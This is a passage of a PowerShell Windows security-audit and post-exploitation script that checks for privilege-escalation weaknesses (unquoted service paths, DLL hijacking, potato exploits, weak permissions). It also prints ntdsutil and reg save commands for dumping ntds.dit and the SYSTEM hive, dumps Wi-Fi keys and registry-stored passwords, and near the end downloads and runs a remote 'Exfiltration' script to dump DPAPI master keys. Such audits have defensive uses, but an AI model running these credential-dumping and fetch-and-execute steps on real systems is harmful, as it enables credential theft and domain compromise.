Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
Start-Sleep -Milliseconds 400
$Count++
}
}
If($Count -eq 0)
{
Write-Host "`nVulnId : OpenSSH Keys [Mitre T1098]"
Write-Host "Location : Unknown"
Write-Host "OpenSSH Key : Unknown"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
Start-Sleep -Milliseconds 400
}
[int]$Counter='0'
Start-Sleep -Milliseconds 1300
## [STARTUP PROGRAMS SEARCH] - search 15 entries max
# Iterate the objects directly: splitting Name/Location on spaces breaks
# entries whose name contains a space and misaligns names with locations
$StartupEntries = @(Get-CimInstance Win32_StartupCommand|Select-Object -First 15)
ForEach($Entry in $StartupEntries)
{
If(-not([string]::IsNullOrEmpty($Entry.Name)))
{
Write-Host "`nVulnId : StartUp Entries [Mitre T1547]"
Write-Host "Location :" $Entry.Location
Write-Host "name :" $Entry.Name
Write-Host "VulnStatus : " -NoNewline
Write-Host "WARNING" -ForegroundColor Yellow
Start-Sleep -Milliseconds 400
$Counter++
}
}
If($Counter -eq 0)
{
Write-Host "`nVulnId : StartUp Entries [Mitre T1547]"
Write-Host "Location : Unknown"
Write-Host "name : Unknown"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
$Service = "Stopped"
Start-Sleep -Milliseconds 1300
## [TERMSERVICE VULNERABILITY SEARCH]
Write-Host "`nVulnId : TermService [Mitre T1021]"
If((Get-Service -Name "termservice" -EA SilentlyContinue).Status -ieq "Running")
{
$Service = "Running"
$PPID = (Get-Process -EA SilentlyContinue|Where-Object{
$_.ProcessName -iMatch 'svchost' -and $_.Responding -iMatch 'True' -and $_.Modules.ModuleName -iMatch "rdpcorets.dll"}).Id
If($PPID)
{
$DLLstatus = "rdpcorets.dll loaded by svchost [PID $PPID]"
$Report = "VULNERABLE"
}
Else
{
$DLLstatus = "rdpcorets.dll not loaded by svchost service"
$Report = "NON VULNERABLE"
}
}
Else
{
# service stopped
$DLLstatus = "Unknown"
$Report = "NON VULNERABLE"
}
Write-Host "Service : $Service"
Write-Host "DLLstatus : $DLLstatus"
Write-Host "VulnStatus : " -NoNewline
If($Report -iMatch "^(VULNERABLE)$")
{
Write-Host "$Report" -ForegroundColor Green
}
Else
{
Write-Host "$Report" -ForegroundColor Red
}
[int]$Counter='0'
Start-Sleep -Milliseconds 1300
## [SEARCH FOR UNQUOTED SERVICE PATHS]
# Only an unquoted path that contains whitespace is exploitable, so require both
$UnquotedTable = (Get-WmiObject -Class Win32_Service -Property Name,DisplayName,PathName,StartMode,StartName|Where-Object {
$_.StartMode -eq "Auto" -and $_.StartName -eq 'LocalSystem' -and $_.PathName -NotLike "C:\Windows*" -and $_.PathName -NotMatch '"' -and $_.PathName -Match '\s'
}).PathName
If($UnquotedTable)
{
ForEach($TokenPath in $UnquotedTable)
{
Write-Host "`nVulnId : Unquoted Service Path [Mitre T1574]"
Write-Host "ServicePath : $TokenPath"
Write-Host "StartName : LocalSystem"
Write-Host "StartMode : Auto"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
Start-Sleep -Milliseconds 400
$Counter++
}
}
If($Counter -eq 0)
{
Write-Host "`nVulnId : Unquoted Service Path [Mitre T1574]"
Write-Host "ServicePath : Not Found"
Write-Host "StartName : Unknown"
Write-Host "StartMode : Unknown"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
$EnvPaths=''
$VulnPaths=''
[int]$Count='0'
## [Env:PATH DLL hijacking]
# Author: @HarmJ0y [PowerUp]
Start-Sleep -Milliseconds 600
$EnvPaths = (Get-Item Env:Path).value.split(';')|Where-Object {$_ -ne ""}
ForEach($VulnPaths in $EnvPaths)
{
$VulnPaths = $VulnPaths.Replace('"',"")
If(-not($VulnPaths.EndsWith("\")))
{
$VulnPaths = $VulnPaths + "\"
}
# reference - http://stackoverflow.com/questions/9735449/how-to-verify-whether-the-share-has-write-access
$TestPath = Join-Path -Path $VulnPaths ([IO.Path]::GetRandomFileName())
# if the path doesn't exist, try to create the folder before testing it for write
If(-not($(Test-Path -Path "$VulnPaths")))
{
try {
# try to create the folder
$Null = New-Item -ItemType directory -Path $VulnPaths
echo $Null > $TestPath
Write-Host "`nVulnId : Env:PATH DLL hijacking [Mitre T1574]"
Write-Host "Env:PATH : $VulnPaths"
If($VulnPaths.EndsWith("\"))
{
Write-Host "Exploitation : ${VulnPaths}" -NoNewline
Write-Host "Malicious.dll" -ForegroundColor Yellow
}
Else
{
Write-Host "Exploitation : ${VulnPaths}\" -NoNewline
Write-Host "Malicious.dll" -ForegroundColor Yellow
}
Write-Host "FolderAccess : Read, Write"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
Start-Sleep -Milliseconds 700
$Count++
}
catch {}
finally
{
# remove the directory
Remove-Item -Path "$VulnPaths" -Recurse -Force -EA SilentlyContinue
}
}
Else
{
# if the folder already exists
try {
echo $Null > $TestPath
Write-Host "`nVulnId : Env:PATH DLL hijacking [Mitre T1574]"
Write-Host "Env:PATH : $VulnPaths"
If($VulnPaths.EndsWith("\"))
{
Write-Host "Exploitation : ${VulnPaths}" -NoNewline
Write-Host "Malicious.dll" -ForegroundColor Yellow
}
Else
{
Write-Host "Exploitation : ${VulnPaths}\" -NoNewline
Write-Host "Malicious.dll" -ForegroundColor Yellow
}
Write-Host "FolderAccess : Read, Write"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
Start-Sleep -Milliseconds 700
$Count++
}
catch {}
finally
{
# Try to remove the item again just to be safe
Remove-Item -Path "$TestPath" -Force -EA SilentlyContinue
}
}
}
If($Count -eq 0)
{
Write-Host "`nVulnId : Env:PATH DLL hijacking [Mitre T1574]"
Write-Host "Env:PATH : Unknown"
Write-Host "Exploitation : Unknown"
Write-Host "FolderAccess : Unknown"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
$NtdsPath = "Unknown"
## [ntds.dit - SeBackupPrivilege ]
# SeChangeNotifyPrivilege <-- for test purposes (active)
# resource: https://www.semperis.com/blog/ntds-dit-extraction-explained
Write-Host "`nVulnId : Ntds::SeBackupPrivilege [Mitre T1003]"
Start-Sleep -Milliseconds 1000
# requires admin
If($IsClientAdmin)
{
If([System.IO.File]::Exists("$Env:WINDIR\NTDS\Ntds.dit"))
{
$NtdsPath = "$Env:WINDIR\NTDS\Ntds.dit"
}
$Ntds = whoami /priv|findstr /i /C:'SeBackupPrivilege'|findstr /i /C:'Enabled'
# Guard the split: findstr returns nothing when the privilege is absent and .split() on $null throws
$privileges0 = If($Ntds){ ("$Ntds").Trim() -split '\s+'|Select-Object -First 1 } Else { "" } # SeBackupPrivilege
If($privileges0 -Match "^(SeBackupPrivilege)$")
{
Write-Host "PrivilegeName : $privileges0"
Write-Host "State : Enabled"
Write-Host "Ntds.dit : $NtdsPath"
# -eq, not -Match: the backslashes in the path would be parsed as regex escapes
If($NtdsPath -eq "$Env:WINDIR\NTDS\Ntds.dit")
{
Write-Host "Exploit : Ntdsutil `"activate instance ntds`" `"ifm`" `"create full $Env:TEMP`" quit quit"
Write-Host "Exploit : Reg save HKLM\SYSTEM `"$Env:TEMP\system.save`""
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
}
Else
{
Write-Host "Exploit : Unknown"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
}
Else
{
Write-Host "PrivilegeName : SeBackupPrivilege"
Write-Host "State : Unknown"
Write-Host "Ntds.dit : $NtdsPath"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
}
Else
{
# Running under user privileges
Write-Host " -----------------------------------------------"
Write-Host " Error: Can only be tested with admin privileges" -ForegroundColor Red
Write-Host " -----------------------------------------------"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
## [ROTTEN POTATO SEARCH]
# SeChangeNotifyPrivilege <-- for test purposes (active)
Write-Host "`nVulnId : Rotten potato escalation [Mitre TA0004]"
Start-Sleep -Milliseconds 1000
## Make sure we are NOT running
# tests under Admin privileges
If(-not($IsClientAdmin))
{
$RottenPrivs = whoami /priv|findstr /i /C:'SeImpersonatePrivilege'|findstr /i /C:'Enabled'
# Guard the split: findstr returns nothing when the privilege is absent and .split() on $null throws
$privileges0 = If($RottenPrivs){ ("$RottenPrivs").Trim() -split '\s+'|Select-Object -First 1 } Else { "" } # SeImpersonatePrivilege
If($privileges0 -iMatch "^(SeImpersonatePrivilege)$")
{
Write-Host "PrivilegeName : $privileges0"
Write-Host "State : Enabled"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
}
Else
{
Write-Host "PrivilegeName : SeImpersonatePrivilege"
Write-Host "State : Unknown"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
}
Else
{
# Running under administrator privileges
Write-Host " -----------------------------------------------"
Write-Host " Error: Can not be tested under admin privileges" -ForegroundColor Red
Write-Host " -----------------------------------------------"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
[int]$EmptySpace='0'
[int]$CountStates='0'
## [JUICY POTATO GOLDEN PRIVILEGES]
# SeShutdownPrivilege - SeChangeNotifyPrivilege <-- for test purposes (active)
Write-Host "`nVulnId : Juicy potato golden escalation [Mitre TA0004]"
Write-Host "*NOTES : Requires 2 Enabled privileges and BITS service"
Write-Host " CLSID identifier to be vulnerable to escalation"
Write-Host " -----------------------------------------------"
Start-Sleep -Milliseconds 1100
## Make sure we are NOT running
# tests under Admin privileges
If(-not($IsClientAdmin))
{
$PrivilegesNames = @(
"SeImpersonatePrivilege",
"SeAssignPrimaryTokenPrivilege"
)
# Get BITS CLSID from registry
$CLSID = (Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\BITS' -Name AppID -EA SilentlyContinue).AppID
If([string]::IsNullOrEmpty($CLSID))
{
$CLSID = "Not Found"
}
# Privilege(s) scanner
ForEach($Privs in $PrivilegesNames)
{
$GoldenPrivs = whoami /priv|findstr /i /C:"$Privs"|findstr /i /C:'Enabled'
# Guard the split: findstr returns nothing when the privilege is absent and .split() on $null throws
$privileges1 = If($GoldenPrivs){ ("$GoldenPrivs").Trim() -split '\s+'|Select-Object -First 1 } Else { "" } # SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege
If($privileges1 -iMatch "^($Privs)$")
{
Write-Host " PrivilegeName : $privileges1"
Write-Host " BITS CLSID : $CLSID"
Write-Host " State : Enabled"
Write-Host " Report : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
If($EmptySpace -lt 1){echo ""} # EmptySpace trick
$CountStates++
$EmptySpace++
}
Else
{
Write-Host " PrivilegeName : $Privs"
Write-Host " BITS CLSID : $CLSID"
Write-Host " State : Unknown"
Write-Host " Report : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
If($EmptySpace -lt 1){echo ""} # EmptySpace trick
$EmptySpace++
}
}# ForEach()
# Report vuln status
If(($CountStates -eq 2) -and ($CLSID -NotMatch "^(Not Found)$"))
{
Write-Host " -----------------------------------------------"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
}
Else
{
Write-Host " -----------------------------------------------"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
}
Else
{
# Running under administrator privileges
Write-Host " Error: Can not be tested under admin privileges" -ForegroundColor Red
Write-Host " -----------------------------------------------"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
Start-Sleep -Milliseconds 1100
## [REMOTE DESKTOP CREDENTIALS VULNERABILITY]
Write-Host "`nVulnId : RDP RDCMan vulnerability [Mitre T1021]"
If([System.IO.File]::Exists("$Env:LOCALAPPDATA\Microsoft\Remote Desktop Connection Manager\RDCMan.settings"))
{
Write-Host "FileName : RDCMan.settings"
Write-Host "Directory : %LOCALAPPDATA%\Microsoft\Remote Desktop Connection Manager"
Write-Host "FilePath : $Env:LOCALAPPDATA\Microsoft\Remote Desktop Connection Manager\RDCMan.settings"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
}
Else
{
Write-Host "FileName : RDCMan.settings"
Write-Host "Directory : Not Found"
Write-Host "FilePath : Not Found"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
Start-Sleep -Milliseconds 1100
## [Plain-text Passwords in LSASS]
Write-Host "`nVulnId : Credentials in LSASS [Mitre T1003]"
$WDigest = (Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest).UseLogonCredential
If(-not([string]::IsNullOrEmpty($WDigest)))
{
If($WDigest -eq 1)
{
Write-Host "Status : Plain-text Passwords may be stored in LSASS"
Write-Host "UseLogonCredential: 1"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
}
ElseIf($WDigest -eq 0)
{
Write-Host "Status : Plain-text Passwords are not stored in LSASS"
Write-Host "UseLogonCredential: 0"
Write-Host "VulnStatus : " -NoNewline
Write-Host "WARNING" -ForegroundColor Yellow
}
}
Else
{
Write-Host "Status : registry key not found"
Write-Host "UseLogonCredential: Unknown"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
Start-Sleep -Milliseconds 1300
## [Registry Plaintext Credentials]
# -EA SilentlyContinue: most of these keys only exist when the product is installed
$TightVNC = (Get-ItemProperty -Path 'HKCU:\Software\TightVNC\Server' -EA SilentlyContinue).TightVNC
$OpenSSH = (Get-ItemProperty -Path 'HKCU:\Software\OpenSSH\Agent\Keys' -EA SilentlyContinue).OpenSSH
$WinVNC3 = (Get-ItemProperty -Path 'HKCU:\Software\ORL\WinVNC3\Password' -EA SilentlyContinue).WinVNC3
$SNMP = (Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\SNMP' -EA SilentlyContinue).SNMP
$WinVNC4 = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\RealVNC\WinVNC4\password' -EA SilentlyContinue).WinVNC4
# Session names are the subkey names; PSChildName avoids the brittle split("\")[5] index
$SavedSessions = (Get-ChildItem -Path 'HKCU:\Software\SimonTatham\PuTTY\Sessions' -EA SilentlyContinue).PSChildName
$LastUsedUsername = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon').LastUsedUsername
$DefaultPasswords = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon').DefaultPassword
$AltDefaultUserNa = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon').AltDefaultUserName
$AltDefaultPasswo = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon').AltDefaultPassword
If(-not([string]::IsNullOrEmpty($LastUsedUsername)))
{
write-host "`nVulnId : Credentials in Regedit [Mitre T1552]"
Write-Host "LastUsedUsername : $LastUsedUsername"
If([string]::IsNullOrEmpty($DefaultPasswords))
{
Write-Host "DefaultPassword : Not Found"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
Else
{
Write-Host "DefaultPassword : $DefaultPasswords"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
}
}
If(-not([string]::IsNullOrEmpty($AltDefaultUserNa)))
{
write-host "`nVulnId : Credentials in Regedit [Mitre T1552]"
Write-Host "AltDefaultUserName: $AltDefaultUserNa"
If([string]::IsNullOrEmpty($AltDefaultPasswo))
{
Write-Host "AltDefaultPassword: Not Found"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
Else
{
Write-Host "AltDefaultPassword: $AltDefaultPasswo"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
}
}
If(-not([string]::IsNullOrEmpty($SavedSessions)))
{
ForEach($Session in $SavedSessions)
{
$Username = (Get-ItemProperty "HKCU:\Software\SimonTatham\PuTTY\Sessions\$Session").UserName
$HostName = (Get-ItemProperty "HKCU:\Software\SimonTatham\PuTTY\Sessions\$Session").Hostname
$PrivateKey = (Get-ItemProperty "HKCU:\Software\SimonTatham\PuTTY\Sessions\$Session").PublicKeyFile
$ProxyPassword = (Get-ItemProperty "HKCU:\Software\SimonTatham\PuTTY\Sessions\$Session").ProxyPassword
$ProxyUsername = (Get-ItemProperty "HKCU:\Software\SimonTatham\PuTTY\Sessions\$Session").ProxyUsername
write-host "`nVulnId : Credentials in Regedit [Mitre T1552]"
write-host "Session Name : $Session"
write-host "Hostname/IP : $HostName"
write-host "UserName : $UserName"
write-host "Proxy Username : $ProxyUsername"
write-host "Proxy Password : $ProxyPassword"
write-host "Private Key : $PrivateKey"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
Start-Sleep -Milliseconds 400
}
}
If(-not([string]::IsNullOrEmpty($TightVNC)))
{
write-host "`nVulnId : Credentials in Regedit [Mitre T1552]"
Write-Host "TightVNC : $TightVNC"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
}
If(-not([string]::IsNullOrEmpty($WinVNC4)))
{
write-host "`nVulnId : Credentials in Regedit [Mitre T1552]"
Write-Host "WinVNC4 : $WinVNC4"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
}
If(-not([string]::IsNullOrEmpty($OpenSSH)))
{
write-host "`nVulnId : Credentials in Regedit [Mitre T1552]"
Write-Host "OpenSSH : $OpenSSH"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
}
If(-not([string]::IsNullOrEmpty($WinVNC3)))
{
write-host "`nVulnId : Credentials in Regedit [Mitre T1552]"
Write-Host "WinVNC3 : $WinVNC3"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
}
If(-not([string]::IsNullOrEmpty($SNMP)))
{
write-host "`nVulnId : Credentials in Regedit [Mitre T1552]"
Write-Host "SNMP : $SNMP"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
}
$Creds = @()
## [Dump WiFi Credentials]
Start-Sleep -Milliseconds 1100
$Profiles = $(netsh wlan show profiles|Select-String -Pattern "All User Profile")
$parsedata = $Profiles -replace 'Profiles on interface Wi-Fi:','' -replace '\s*All User Profile\s*: ',''
ForEach($Item in $parsedata)
{
$Creds += $(netsh wlan show profiles name=$Item key=clear|findstr "SSID Content"|findstr /V "Number")
}
If(-not([string]::IsNullOrEmpty($Creds)))
{
write-host "`nVulnId : Dump WIFI Credentials [Mitre T1016]"
Write-Host " -----------------------------------------------"
$Creds -replace '"','' -replace '^(\s*)',' ' -replace ' : ',' : ' -replace 'Key Content : ','SSID password : '
Write-Host " -----------------------------------------------"
Write-Host "VulnStatus : " -NoNewline
Write-Host "WARNING" -ForegroundColor Yellow
}
Else
{
write-host "`nVulnId : Dump WIFI Credentials [Mitre T1016]"
Write-Host "Status : Unable to find SSIDs or credentials"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
Start-Sleep -Milliseconds 1100
## [HardCoded credentials in XML files]
$XMLDataBase = @(
"$Env:WINDIR\unattend.xml",
"$Env:WINDIR\sysprep\sysprep.xml",
"$Env:ALLUSERSPROFILE\Groups.xml",
"$Env:WINDIR\Panther\unattend.xml",
"$Env:ALLUSERSPROFILE\Services.xml",
"$Env:ALLUSERSPROFILE\Printers.xml",
"$Env:WINDIR\system32\sysprep\sysprep.xml",
"$Env:WINDIR\Panther\Unattend\Unattend.xml"
)
ForEach($Token in $XMLDataBase)
{
If([System.IO.File]::Exists("$Token"))
{
<#
.SYNOPSIS
Author: @r00t-3xp10it
Helper - Scan for Base64 strings inside XML file
#>
$CheckBase64 = (Get-ChildItem -Path "$Token"|
Select-String -Pattern '((([A-Za-z0-9+/]{4})*)([A-Za-z0-9+/]{4}|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{2}==))'|
Where-Object {$_ -Match '([A-Za-z0-9+/]{10}(=|==)</\w+>|[A-Za-z0-9+/]{10}(=|==)>)$'}) # regex: '(=|==)</value>' OR '(=|==)>'
# Store the full XML syntax tag where the Base64 string was found
$FoundString = ($CheckBase64 -split(":")|Select-Object -Last 1) -replace '^\s+',''
## Get the XML line number where the Base64 string was found
$LineNumber = ($CheckBase64 -split(":")|Select-Object -Skip 2)[0]
## Get the Base64 string only to check length and empty spaces
$CheckLength = ($CheckBase64 -split(">") -split("</"))[1]
If([string]::IsNullOrEmpty($FoundString))
{
$FoundString = "Unknown"
}
Write-Host "`nVulnId : HardCoded Credentials in XML [mitre T1552]"
Write-Host "FilePath : $Token"
Write-Host "Status : XML found [scan for Base64]"
Write-Host "Base64 : " -NoNewline
Start-Sleep -Milliseconds 300
If(($CheckLength -NotMatch '\s+') -and ($CheckLength.Length -gt 10))
{
Write-Host "$FoundString" -ForegroundColor Black -BackgroundColor White
Write-Host "LineNumber : $LineNumber"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
Start-Sleep -Milliseconds 700
}
else
{
Write-Host "Unknown"
Write-Host "VulnStatus : " -NoNewline
Write-Host "WARNING" -ForegroundColor Yellow
Start-Sleep -Milliseconds 500
}
}
Else
{
Write-Host "`nVulnId : HardCoded Credentials in XML [mitre T1552]"
Write-Host "FilePath : $Token"
Write-Host "Status : XML Not found"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
Start-Sleep -Milliseconds 400
}
}
$PIPDATABASE=''
[int]$Counter='0'
Start-Sleep -Milliseconds 1100
## [NAMED PIPES VULNERABILITY]
# Get pipe HOSTNAME\USERNAME (SKYNET\pedro) AccessControl FileSystemRights
$GetAccessControl = (Get-ChildItem -Path "\\.\pipe\"|ForEach-Object -EA SilentlyContinue GetAccessControl)
$FileSystemRights = (($GetAccessControl).Access|Where-Object{
$_.FileSystemRights -Match "FullControl" -or $_.FileSystemRights -Match "CreateFiles"}|
Select-Object -first 1|findstr /C:"FileSystemRights") -replace "FileSystemRights : ",""
If([string]::IsNullOrEmpty($FileSystemRights) -or ($FileSystemRights -Match '^(-1)'))
{
$FileSystemRights = "Unknown"
}
# Search for 5 (max) named pipes available
$SearchPipes = (Get-ChildItem -Path "\\.\pipe\").FullName
$PIPDATABASE = ($SearchPipes|Select-Object -Skip 1|Select-Object -First 5)
ForEach($NamedPipe in $PIPDATABASE)
{
$OwnerID = (($GetAccessControl).Access|Where-Object{
$_.FileSystemRights -Match "FullControl" -or $_.FileSystemRights -Match "CreateFiles"}|
Select-Object -first 1|findstr /C:"IdentityReference") -replace "IdentityReference : ",""
Write-Host "`nVulnId : NAMED Pipes vulnerability [Mitre T27308]"
Write-Host "Pipe : $NamedPipe" # \\.\pipe\lsass\
Write-Host "Owner : $OwnerID" # BUILTIN\Administradores
Write-Host "GetAccessControl : $FileSystemRights" # CreateFiles, WriteExtendedAttributes, WriteAttributes, Read, Synchronize
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
Start-Sleep -Milliseconds 400
$Counter++
}
# $Counter is incremented once per pipe reported above; the original test ($SearchPipes -eq 0)
# compared an array of paths with 0 and could never be true, so the "Not Found" branch never ran
If($Counter -eq 0)
{
Write-Host "`nVulnId : NAMED Pipes vulnerability [Mitre T27308]"
Write-Host "Pipe : Not Found"
Write-Host "Owner : Unknown"
Write-Host "GetAccessControl : Unknown"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
$param1 = "FullControl"
## [WEAK DIRECTORY PERMISSIONS]
# Get Group Name (BUILTIN\users) in different languages NOTE: England, Portugal, France, Germany, Indonesia, Holland, Romania, Croatia, Spain
$FindGroupUser = whoami /groups|findstr /C:"BUILTIN\Users" /C:"BUILTIN\Utilizadores" /C:"BUILTIN\Utilisateurs" /C:"BUILTIN\Benutzer" /C:"BUILTIN\Pengguna" /C:"BUILTIN\Gebruikers" /C:"BUILTIN\Utilizatori" /C:"BUILTIN\Korisnici" /C:"BUILTIN\Usuarios"|Select-Object -First 1
$param2 = $FindGroupUser.split()[0]
# Escaping backslash's and quotes.
If($param2 -Match '"' -and $param2 -Match '\\')
{
$UserGroup = $param2 -replace '\\','\\' -replace '"',''
}
ElseIf($param2 -Match '\\')
{
$UserGroup = $param2 -replace '\\','\\'
}
ElseIf($param2 -Match '"')
{
$UserGroup = $param2 -replace '"',''
}
Else
{
$UserGroup = $param2
}
[int]$CountStates='0'
# Directories to search recursively: $Env:PROGRAMFILES, ${Env:PROGRAMFILES(x86)}, $Env:LOCALAPPDATA\Programs\
# $dAtAbAsEList = Get-ChildItem -Path "$Env:LOCALAPPDATA\Programs\" -Recurse -ErrorAction SilentlyContinue -Force|Where { $_.PSIsContainer }|Select -ExpandProperty FullName
$dAtAbAsEList = Get-ChildItem -Path "$Env:PROGRAMFILES", "${Env:PROGRAMFILES(x86)}", "$Env:LOCALAPPDATA\Programs\" -Recurse -ErrorAction SilentlyContinue -Force|Where { $_.PSIsContainer }|Select -ExpandProperty FullName
ForEach($Token in $dAtAbAsEList)
{
If(-not($Token -Match 'WindowsApps'))
{
$IsInHerit = (Get-Acl "$Token").Access.IsInherited|Select -First 1
# ForEach-Object is the loop the original Where-Object block was being used as (its block never emitted objects)
(Get-Acl "$Token").Access|ForEach-Object {
$CleanOutput = $_.FileSystemRights -Match "$param1" -and $_.IdentityReference -Match "$UserGroup" ## <-- In my system the IdentityReference is: 'BUILTIN\Utilizadores'
If($CleanOutput)
{
Write-Host "`nVulnId : Weak Directory permissions [Mitre T1222]"
Write-Host "FolderPath : $Token"
Write-Host "FileSystemRights : $param1"
Write-Host "IdentityReference : $UserGroup"
Write-Host "IsInherited : $IsInHerit"
Write-Host "VulnStatus : " -NoNewline
Write-Host "VULNERABLE" -ForegroundColor Green
Start-Sleep -Milliseconds 300
$CountStates++
}
}# End of Get-Acl loop
}# End of Exclude WindowsApps
}# End of ForEach() loop
If($CountStates -eq 0)
{
Write-Host "`nVulnId : Weak Directory permissions [Mitre T1222]"
Write-Host "FolderPath : Not Found"
Write-Host "FileSystemRights : Unknown"
Write-Host "IdentityReference : Unknown"
Write-Host "IsInherited : Unknown"
Write-Host "VulnStatus : " -NoNewline
Write-Host "NON VULNERABLE" -ForegroundColor Red
}
$WorkingPath = $pwd
## [Dump DPAPI masterkeys\blobs\loginfiles]
iwr -uri "https://raw.githubusercontent.com/r00t-3xp10it/redpill/refs/heads/main/lib/Exfiltration/Invoke-VaultCmd.ps1" -OutFile "$Env:TMP\Invoke-VaultCmd.ps1"|Unblock-File
(Get-Content -Path "$Env:TMP\Invoke-VaultCmd.ps1").Replace('Clear-Host', '#Clear-Host')|Set-Content "$Env:TMP\Invoke-VaultCmd.ps1"
cd $Env:TMP
.\Invoke-VaultCmd.ps1 -action DPAPI -Banner false
Remove-Item -Path "$Env:TMP\Invoke-VaultCmd.ps1" -Force
$host.UI.RawUI.WindowTitle = "@ScanTCP $CmdletVersion"
cd $WorkingPath
echo ""
## BalloonTip
Invoke-BallonTip
exit
}
# For LOOP [Netstat|NetTCPConnection]
For($i=1; $i -le $MaxScans; $i++)
{
If($i -eq 1)
{
## Print banner + settings OnScreen
write-host $StartBanner -ForegroundColor DarkRed
Write-Host "Capture " -ForegroundColor Red -NoNewline
Write-Host "$IP" -ForegroundColor Yellow -NoNewline
Write-Host " TCP Connections Settings`n" -ForegroundColor Red
Write-Host "Invoke : $Invoke"
Write-Host "Filter : $Filter"
Write-Host "ScanType : $ScanType"
If($ScanType -iMatch "^(automatic)$")
{
Write-Host "ScanEach : $ScanEach seconds"
}
Write-Host "MaxScans to perform : $Maxscans scans"
If($Process.IsPresent)
{
Write-Host "ProcessNames : " -NoNewline
Write-Host "$Process" -ForegroundColor Green
}
Write-Host "Create logfile : $Logfile`n"
# Press to continue
cmd /c 'pause'
Clear-Host
}
If($Invoke -iMatch "^(netstat)$")
{
# Draw script banner
$CmdLetAppl = "Netstat"
write-host $StartBanner -ForegroundColor DarkRed
Write-Host "List ESTABLISHED " -ForegroundColor Green -NoNewline
Write-Host "$IP " -ForegroundColor Yellow -NoNewline
Write-Host "TCP Connections`n" -ForegroundColor Green
If($Process.IsPresent)
{
<#
.SYNOPSIS
Author: @r00t-3xp10it
Helper - Use NETSTAT command to list established TCP connections
.NOTES
<-Invoke 'netstat'> together with <-Process> switch will
display the Process Name associated with the TCP connection
and alert user of suspicious TCP connections (yellow color)
and possible exploitable service names using the (red color)
Invoking -filter '127.0.0.1' will delete from scan report
all '127.0.0.1' strings found and their corresponding lines
.OUTPUTS
Name Status LinkSpeed ifDesc
---- ------ --------- ------
Wi-Fi Up 286.8 Mbps MediaTek Wi-Fi 6 MT7921 Wireless LAN Card
Ethernet Disconnected 0 bps Realtek PCIe GbE Family Controller
Proto State LocalAddress LocalPort RemoteAddress RemotePort ProcessName OwningProcess
----- ----- ------------ --------- ------------- ---------- ----------- -------------
TCP Established 127.0.0.1 5141 127.0.0.1 58600 AcerQAAgent 4296
